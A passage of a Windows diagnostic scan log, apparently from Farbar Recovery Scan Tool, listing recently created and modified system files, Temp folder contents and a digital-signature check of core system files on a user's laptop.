Corporation) C:\windows\system32\srcore.dll2014-10-15 08:11 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\windows\system32\rstrui.exe2014-10-15 08:11 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\windows\system32\appidapi.dll2014-10-15 08:11 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\windows\system32\appidsvc.dll2014-10-15 08:11 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\windows\system32\Drivers\appid.sys2014-10-15 08:11 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\windows\system32\wmp.dll2014-10-15 08:11 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\windows\system32\wmdrmsdk.dll2014-10-15 08:11 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\windows\system32\wintrust.dll2014-10-15 08:11 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\windows\system32\ntoskrnl.exe2014-10-15 08:11 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\windows\system32\mf.dll2014-10-15 08:11 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\windows\system32\quartz.dll2014-10-15 08:11 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\windows\system32\crypt32.dll2014-10-15 08:11 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\windows\system32\drmv2clt.dll2014-10-15 08:11 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\windows\system32\cryptui.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\windows\system32\blackbox.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\windows\system32\audiosrv.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\windows\system32\msscp.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\windows\system32\evr.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\windows\system32\AUDIOKSE.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\windows\system32\drmmgrtn.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\windows\system32\AudioEng.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\windows\system32\mfplat.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\windows\system32\msnetobj.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\windows\system32\AudioSes.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\windows\system32\EncDump.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\windows\system32\pcasvc.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\windows\system32\cryptsvc.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\windows\system32\cryptsp.dll2014-10-15 08:11 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\windows\system32\rrinstaller.exe2014-10-15 08:11 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\windows\system32\audiodg.exe2014-10-15 08:11 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\windows\system32\Drivers\PEAuth.sys2014-10-15 08:11 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmp.dll2014-10-15 08:11 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\windows\SysWOW64\mf.dll2014-10-15 08:11 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\windows\SysWOW64\quartz.dll2014-10-15 08:11 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\windows\SysWOW64\crypt32.dll2014-10-15 08:11 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptui.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\windows\SysWOW64\drmv2clt.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\windows\SysWOW64\blackbox.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmdrmsdk.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\windows\SysWOW64\msscp.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\windows\SysWOW64\evr.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\windows\SysWOW64\AUDIOKSE.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\windows\SysWOW64\drmmgrtn.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioEng.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfplat.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\windows\SysWOW64\msnetobj.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\windows\SysWOW64\AudioSes.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\windows\SysWOW64\wintrust.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptsvc.dll2014-10-15 08:11 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\windows\SysWOW64\cryptsp.dll2014-10-15 08:11 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntkrnlpa.exe2014-10-15 08:11 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\windows\SysWOW64\ntoskrnl.exe2014-10-15 08:11 - 2014-06-27 19:21 - 00619056 _____ (Microsoft Corporation) C:\windows\system32\winload.exe2014-10-15 08:11 - 2014-06-27 19:21 - 00532176 _____ (Microsoft Corporation) C:\windows\system32\winresume.exe2014-10-15 08:11 - 2014-06-27 19:21 - 00457400 _____ (Microsoft Corporation) C:\windows\system32\ci.dll2014-10-15 08:11 - 2014-06-18 17:23 - 01943696 _____ (Microsoft Corporation) C:\windows\system32\dfshim.dll2014-10-15 08:11 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\windows\SysWOW64\dfshim.dll2014-10-15 08:11 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscorier.dll2014-10-15 08:11 - 2014-06-18 17:23 - 00156312 _____ (Microsoft Corporation) C:\windows\system32\mscorier.dll2014-10-15 08:11 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\windows\SysWOW64\mscories.dll2014-10-15 08:11 - 2014-06-18 17:23 - 00073880 _____ (Microsoft Corporation) C:\windows\system32\mscories.dll2014-10-15 08:10 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll2014-10-15 08:10 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll2014-10-15 08:10 - 2014-10-09 21:00 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll2014-10-15 08:10 - 2014-10-06 21:54 - 00378552 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll2014-10-15 08:10 - 2014-10-06 21:04 - 00331448 _____ (Microsoft Corporation) C:\windows\SysWOW64\iedkcs32.dll2014-10-15 08:10 - 2014-09-25 17:50 - 13619200 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll2014-10-15 08:10 - 2014-09-25 17:46 - 00365056 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtmsft.dll2014-10-15 08:10 - 2014-09-25 17:46 - 00243200 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxtrans.dll2014-10-15 08:10 - 2014-09-25 17:46 - 00069632 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmled.dll2014-10-15 08:10 - 2014-09-25 17:43 - 11807232 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieframe.dll2014-10-15 08:10 - 2014-09-25 17:32 - 02017280 _____ (Microsoft Corporation) C:\windows\SysWOW64\inetcpl.cpl2014-10-15 08:10 - 2014-09-25 17:31 - 02108416 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl2014-10-15 08:10 - 2014-09-18 21:25 - 23631360 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll2014-10-15 08:10 - 2014-09-18 20:56 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb2014-10-15 08:10 - 2014-09-18 20:55 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll2014-10-15 08:10 - 2014-09-18 20:44 - 17484800 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.dll2014-10-15 08:10 - 2014-09-18 20:41 - 02796032 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll2014-10-15 08:10 - 2014-09-18 20:40 - 00547328 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll2014-10-15 08:10 - 2014-09-18 20:40 - 00066048 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll2014-10-15 08:10 - 2014-09-18 20:39 - 00048640 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll2014-10-15 08:10 - 2014-09-18 20:38 - 00083968 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll2014-10-15 08:10 - 2014-09-18 20:36 - 05829632 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll2014-10-15 08:10 - 2014-09-18 20:31 - 00051200 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll2014-10-15 08:10 - 2014-09-18 20:30 - 00033792 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll2014-10-15 08:10 - 2014-09-18 20:27 - 00595968 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll2014-10-15 08:10 - 2014-09-18 20:26 - 00139264 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe2014-10-15 08:10 - 2014-09-18 20:25 - 04201472 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9.dll2014-10-15 08:10 - 2014-09-18 20:25 - 00758272 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll2014-10-15 08:10 - 2014-09-18 20:25 - 00111616 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe2014-10-15 08:10 - 2014-09-18 20:18 - 00940032 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe2014-10-15 08:10 - 2014-09-18 20:14 - 02724864 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtml.tlb2014-10-15 08:10 - 2014-09-18 20:14 - 00446464 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll2014-10-15 08:10 - 2014-09-18 20:06 - 00072704 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll2014-10-15 08:10 - 2014-09-18 20:02 - 00454656 _____ (Microsoft Corporation) C:\windows\SysWOW64\vbscript.dll2014-10-15 08:10 - 2014-09-18 20:01 - 00195584 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll2014-10-15 08:10 - 2014-09-18 20:01 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\iesetup.dll2014-10-15 08:10 - 2014-09-18 20:01 - 00051200 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieetwproxystub.dll2014-10-15 08:10 - 2014-09-18 20:00 - 00085504 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll2014-10-15 08:10 - 2014-09-18 19:59 - 00061952 _____ (Microsoft Corporation) C:\windows\SysWOW64\MshtmlDac.dll2014-10-15 08:10 - 2014-09-18 19:58 - 00289280 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll2014-10-15 08:10 - 2014-09-18 19:55 - 02187264 _____ (Microsoft Corporation) C:\windows\SysWOW64\iertutil.dll2014-10-15 08:10 - 2014-09-18 19:54 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\jsproxy.dll2014-10-15 08:10 - 2014-09-18 19:53 - 00032768 _____ (Microsoft Corporation) C:\windows\SysWOW64\iernonce.dll2014-10-15 08:10 - 2014-09-18 19:51 - 00440320 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieui.dll2014-10-15 08:10 - 2014-09-18 19:50 - 00112128 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieUnatt.exe2014-10-15 08:10 - 2014-09-18 19:49 - 00597504 _____ (Microsoft Corporation) C:\windows\SysWOW64\jscript9diag.dll2014-10-15 08:10 - 2014-09-18 19:42 - 00731136 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll2014-10-15 08:10 - 2014-09-18 19:42 - 00710656 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe2014-10-15 08:10 - 2014-09-18 19:40 - 01249280 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll2014-10-15 08:10 - 2014-09-18 19:36 - 00060416 _____ (Microsoft Corporation) C:\windows\SysWOW64\JavaScriptCollectionAgent.dll2014-10-15 08:10 - 2014-09-18 19:33 - 02309632 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll2014-10-15 08:10 - 2014-09-18 19:32 - 00164864 _____ (Microsoft Corporation) C:\windows\SysWOW64\msrating.dll2014-10-15 08:10 - 2014-09-18 19:20 - 00607744 _____ (Microsoft Corporation) C:\windows\SysWOW64\msfeeds.dll2014-10-15 08:10 - 2014-09-18 19:18 - 01068032 _____ (Microsoft Corporation) C:\windows\SysWOW64\mshtmlmedia.dll2014-10-15 08:10 - 2014-09-18 19:14 - 01447936 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll2014-10-15 08:10 - 2014-09-18 18:59 - 01810944 _____ (Microsoft Corporation) C:\windows\SysWOW64\wininet.dll2014-10-15 08:10 - 2014-09-18 18:59 - 00775168 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll2014-10-15 08:10 - 2014-09-18 18:53 - 01190400 _____ (Microsoft Corporation) C:\windows\SysWOW64\urlmon.dll2014-10-15 08:10 - 2014-09-18 18:52 - 00678400 _____ (Microsoft Corporation) C:\windows\SysWOW64\ieapfltr.dll2014-10-15 08:10 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\windows\system32\setbcdlocale.dll2014-10-15 08:10 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\windows\system32\srclient.dll2014-10-15 08:10 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\windows\system32\appidpolicyconverter.exe2014-10-15 08:10 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\windows\system32\appidcertstorecheck.exe2014-10-15 08:10 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\windows\SysWOW64\appidapi.dll2014-10-15 08:10 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\windows\SysWOW64\srclient.dll2014-10-15 08:10 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\windows\system32\mfps.dll2014-10-15 08:10 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\windows\system32\mfpmp.exe2014-10-15 08:10 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\windows\system32\spwmp.dll2014-10-15 08:10 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\windows\system32\msdxm.ocx2014-10-15 08:10 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\windows\system32\dxmasf.dll2014-10-15 08:10 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\windows\system32\wmploc.DLL2014-10-15 08:10 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\mferror.dll2014-10-15 08:10 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfps.dll2014-10-15 08:10 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\windows\SysWOW64\spwmp.dll2014-10-15 08:10 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\windows\SysWOW64\msdxm.ocx2014-10-15 08:10 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\windows\SysWOW64\dxmasf.dll2014-10-15 08:10 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\windows\SysWOW64\wmploc.DLL2014-10-15 08:10 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\windows\SysWOW64\rrinstaller.exe2014-10-15 08:10 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\windows\SysWOW64\mfpmp.exe2014-10-15 08:10 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\windows\SysWOW64\mferror.dll2014-10-15 08:09 - 2014-09-17 21:00 - 03241472 _____ (Microsoft Corporation) C:\windows\system32\msi.dll2014-10-15 08:09 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\windows\SysWOW64\msi.dll2014-10-15 08:09 - 2014-09-04 00:23 - 00424448 _____ (Microsoft Corporation) C:\windows\system32\rastls.dll2014-10-15 08:09 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\windows\SysWOW64\rastls.dll2014-10-15 08:09 - 2014-08-28 21:07 - 05780480 _____ (Microsoft Corporation) C:\windows\system32\mstscax.dll2014-10-15 08:09 - 2014-08-28 21:07 - 03179520 _____ (Microsoft Corporation) C:\windows\system32\rdpcorets.dll2014-10-15 08:09 - 2014-08-28 21:07 - 00322560 _____ (Microsoft Corporation) C:\windows\system32\aaclient.dll2014-10-15 08:09 - 2014-08-28 21:07 - 00044032 _____ (Microsoft Corporation) C:\windows\system32\tsgqec.dll2014-10-15 08:09 - 2014-08-28 21:06 - 01125888 _____ (Microsoft Corporation) C:\windows\system32\mstsc.exe2014-10-15 08:09 - 2014-08-28 20:44 - 04922368 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstscax.dll2014-10-15 08:09 - 2014-08-28 20:44 - 01050112 _____ (Microsoft Corporation) C:\windows\SysWOW64\mstsc.exe2014-10-15 08:09 - 2014-08-28 20:44 - 00269312 _____ (Microsoft Corporation) C:\windows\SysWOW64\aaclient.dll2014-10-15 08:09 - 2014-08-28 20:44 - 00037376 _____ (Microsoft Corporation) C:\windows\SysWOW64\tsgqec.dll2014-10-15 08:09 - 2014-07-16 21:07 - 00681984 _____ (Microsoft Corporation) C:\windows\system32\termsrv.dll2014-10-15 08:09 - 2014-07-16 21:07 - 00455168 _____ (Microsoft Corporation) C:\windows\system32\winlogon.exe2014-10-15 08:09 - 2014-07-16 21:07 - 00235520 _____ (Microsoft Corporation) C:\windows\system32\winsta.dll2014-10-15 08:09 - 2014-07-16 21:07 - 00150528 _____ (Microsoft Corporation) C:\windows\system32\rdpcorekmts.dll2014-10-15 08:09 - 2014-07-16 21:07 - 00086528 _____ (Microsoft Corporation) C:\windows\system32\TSpkg.dll2014-10-15 08:09 - 2014-07-16 21:07 - 00022016 _____ (Microsoft Corporation) C:\windows\system32\credssp.dll2014-10-15 08:09 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\windows\SysWOW64\winsta.dll2014-10-15 08:09 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\windows\SysWOW64\TSpkg.dll2014-10-15 08:09 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\windows\SysWOW64\credssp.dll2014-10-15 08:09 - 2014-07-16 20:21 - 00212480 _____ (Microsoft Corporation) C:\windows\system32\Drivers\rdpwd.sys2014-10-15 08:09 - 2014-07-16 20:21 - 00039936 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tssecsrv.sys2014-10-15 08:08 - 2014-09-12 20:58 - 00077312 _____ (Microsoft Corporation) C:\windows\system32\packager.dll2014-10-15 08:08 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\windows\SysWOW64\packager.dll2014-10-12 09:09 - 2014-10-12 09:09 - 00002159 _____ () C:\Users\Public\Desktop\SDL Trados Studio 2011.lnk2014-10-07 08:50 - 2014-10-07 08:50 - 00000000 ____D () C:\Users\Patrick\AppData\Roaming\com.adobe.formscentral.FormsCentralForAcrobat ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-05 10:46 - 2014-09-13 09:52 - 561448986 _____ () C:\windows\MEMORY.DMP2014-11-05 10:46 - 2014-09-13 09:52 - 00000000 ____D () C:\windows\Minidump2014-11-05 10:45 - 2012-03-08 01:56 - 00205546 _____ () C:\windows\PFRO.log2014-11-05 10:44 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\LiveKernelReports2014-11-05 10:43 - 2012-03-08 01:19 - 01077790 _____ () C:\windows\WindowsUpdate.log2014-11-05 10:43 - 2009-07-14 00:13 - 00786622 _____ () C:\windows\system32\PerfStringBackup.INI2014-11-05 10:39 - 2013-01-21 22:34 - 00000898 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job2014-11-05 10:36 - 2013-01-21 22:34 - 00000894 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job2014-11-05 10:36 - 2011-03-06 17:20 - 00000000 ____D () C:\ProgramData\PDFC2014-11-05 10:35 - 2009-07-14 00:08 - 00000006 ____H () C:\windows\Tasks\SA.DAT2014-11-05 10:35 - 2009-07-13 23:51 - 00080626 _____ () C:\windows\setupact.log2014-11-05 10:35 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\Help2014-11-05 10:16 - 2009-07-13 23:45 - 00025648 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A02014-11-05 10:16 - 2009-07-13 23:45 - 00025648 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A02014-11-05 08:02 - 2013-02-12 23:22 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job2014-11-05 07:53 - 2013-01-21 22:15 - 00000000 ____D () C:\Users\Patrick\Documents\Outlook Files2014-11-04 21:48 - 2013-01-22 21:42 - 00000052 _____ () C:\windows\SysWOW64\DOErrors.log2014-11-04 21:46 - 2013-02-19 21:21 - 00000000 _____ () C:\windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt2014-11-04 20:03 - 2009-07-14 00:09 - 00000000 ____D () C:\windows\System32\Tasks\WPD2014-11-01 20:27 - 2013-01-23 11:57 - 00003198 _____ () C:\windows\System32\Tasks\HPCeeScheduleForPatrick2014-11-01 20:27 - 2013-01-23 11:57 - 00000340 _____ () C:\windows\Tasks\HPCeeScheduleForPatrick.job2014-10-30 06:25 - 2013-01-21 18:19 - 00275080 ____N (Microsoft Corporation) C:\windows\system32\MpSigStub.exe2014-10-22 10:10 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\NDF2014-10-19 18:34 - 2013-01-21 22:34 - 00003894 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineUA2014-10-19 18:34 - 2013-01-21 22:34 - 00003642 _____ () C:\windows\System32\Tasks\GoogleUpdateTaskMachineCore2014-10-16 03:17 - 2013-01-22 01:46 - 00000000 ____D () C:\windows\rescache2014-10-16 02:35 - 2009-07-13 22:20 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories2014-10-16 02:33 - 2009-07-13 23:45 - 00457544 _____ () C:\windows\system32\FNTCACHE.DAT2014-10-16 02:30 - 2014-05-07 02:00 - 00000000 ___SD () C:\windows\system32\CompatTel2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\SysWOW64\Dism2014-10-16 02:30 - 2009-07-13 22:20 - 00000000 ____D () C:\windows\system32\Dism2014-10-16 02:11 - 2013-01-21 18:18 - 00000000 ____D () C:\ProgramData\Microsoft Help2014-10-16 02:05 - 2013-08-11 02:00 - 00000000 ____D () C:\windows\system32\MRT2014-10-16 02:00 - 2013-01-25 17:22 - 103265616 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe2014-10-13 16:58 - 2013-01-21 17:58 - 00003230 _____ () C:\windows\System32\Tasks\HPCeeScheduleForPATRICK_LAPTOP$2014-10-13 16:58 - 2013-01-21 17:58 - 00000354 _____ () C:\windows\Tasks\HPCeeScheduleForPATRICK_LAPTOP$.job2014-10-07 08:50 - 2013-01-21 18:00 - 00000000 ____D () C:\Users\Patrick\AppData\Roaming\Adobe Files to move or delete:====================C:\Users\Patrick\gotomypc_280.exeC:\Users\Patrick\gotomypc_626.exeC:\Users\Patrick\gotomypc_635.exe Some content of TEMP:====================C:\Users\Patrick\AppData\Local\Temp\1vi7f-5c.dllC:\Users\Patrick\AppData\Local\Temp\6uwe7vr0.dllC:\Users\Patrick\AppData\Local\Temp\AtpTimerInfo.dllC:\Users\Patrick\AppData\Local\Temp\Extract.exeC:\Users\Patrick\AppData\Local\Temp\HPHelpUpdater.exeC:\Users\Patrick\AppData\Local\Temp\LiveUpdater.exeC:\Users\Patrick\AppData\Local\Temp\MouseKeyboardCenterx64_1033.exeC:\Users\Patrick\AppData\Local\Temp\Resource.exeC:\Users\Patrick\AppData\Local\Temp\SP52308.exeC:\Users\Patrick\AppData\Local\Temp\SP52407.exeC:\Users\Patrick\AppData\Local\Temp\SP52437.exeC:\Users\Patrick\AppData\Local\Temp\SP52509.exeC:\Users\Patrick\AppData\Local\Temp\SP52637.exeC:\Users\Patrick\AppData\Local\Temp\SP52641.exeC:\Users\Patrick\AppData\Local\Temp\SP53227.exeC:\Users\Patrick\AppData\Local\Temp\SP53380.exeC:\Users\Patrick\AppData\Local\Temp\SP53394.exeC:\Users\Patrick\AppData\Local\Temp\SP53451.exeC:\Users\Patrick\AppData\Local\Temp\SP53526.exeC:\Users\Patrick\AppData\Local\Temp\SP53918.exeC:\Users\Patrick\AppData\Local\Temp\SP54203.exeC:\Users\Patrick\AppData\Local\Temp\SP54317.exeC:\Users\Patrick\AppData\Local\Temp\SP54841.exeC:\Users\Patrick\AppData\Local\Temp\SP54922.exeC:\Users\Patrick\AppData\Local\Temp\SP55182.exeC:\Users\Patrick\AppData\Local\Temp\SP56395.exeC:\Users\Patrick\AppData\Local\Temp\SP56689.exeC:\Users\Patrick\AppData\Local\Temp\SP56729.exeC:\Users\Patrick\AppData\Local\Temp\SP56811.exeC:\Users\Patrick\AppData\Local\Temp\SP56988.exeC:\Users\Patrick\AppData\Local\Temp\SP57014.exeC:\Users\Patrick\AppData\Local\Temp\SP57495.exeC:\Users\Patrick\AppData\Local\Temp\SP57498.exeC:\Users\Patrick\AppData\Local\Temp\SP57555.exeC:\Users\Patrick\AppData\Local\Temp\SP57556.exeC:\Users\Patrick\AppData\Local\Temp\SP58116.exeC:\Users\Patrick\AppData\Local\Temp\SP58268.exeC:\Users\Patrick\AppData\Local\Temp\SP58778.exeC:\Users\Patrick\AppData\Local\Temp\SP58782.exeC:\Users\Patrick\AppData\Local\Temp\sp58915.exeC:\Users\Patrick\AppData\Local\Temp\SP59033.exeC:\Users\Patrick\AppData\Local\Temp\SP59043.exeC:\Users\Patrick\AppData\Local\Temp\SP59202.exeC:\Users\Patrick\AppData\Local\Temp\SP59213.exeC:\Users\Patrick\AppData\Local\Temp\SP59291.exeC:\Users\Patrick\AppData\Local\Temp\SP59339.exeC:\Users\Patrick\AppData\Local\Temp\SP59346.exeC:\Users\Patrick\AppData\Local\Temp\SP59426.exeC:\Users\Patrick\AppData\Local\Temp\SP60365.exeC:\Users\Patrick\AppData\Local\Temp\SP60686.exeC:\Users\Patrick\AppData\Local\Temp\SP60775.exeC:\Users\Patrick\AppData\Local\Temp\SP61138.exeC:\Users\Patrick\AppData\Local\Temp\SP61823.exeC:\Users\Patrick\AppData\Local\Temp\SP62357.exeC:\Users\Patrick\AppData\Local\Temp\SP62449.exeC:\Users\Patrick\AppData\Local\Temp\SP62738.exeC:\Users\Patrick\AppData\Local\Temp\SP63565.exeC:\Users\Patrick\AppData\Local\Temp\SP63779.exeC:\Users\Patrick\AppData\Local\Temp\sp64126.exeC:\Users\Patrick\AppData\Local\Temp\SP64284.exeC:\Users\Patrick\AppData\Local\Temp\SP64287.exeC:\Users\Patrick\AppData\Local\Temp\SP64757.exeC:\Users\Patrick\AppData\Local\Temp\SP65266.exeC:\Users\Patrick\AppData\Local\Temp\SP66111.exeC:\Users\Patrick\AppData\Local\Temp\UninstallHPSA.exeC:\Users\Patrick\AppData\Local\Temp\UninstallHPTCA.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signedC:\Windows\System32\wininit.exe => File is digitally signedC:\Windows\SysWOW64\wininit.exe => File is digitally signedC:\Windows\explorer.exe => File is digitally signedC:\Windows\SysWOW64\explorer.exe => File is digitally signedC:\Windows\System32\svchost.exe => File is digitally signedC:\Windows\SysWOW64\svchost.exe => File is digitally signedC:\Windows\System32\services.exe => File is digitally signedC:\Windows\System32\User32.dll => File is digitally 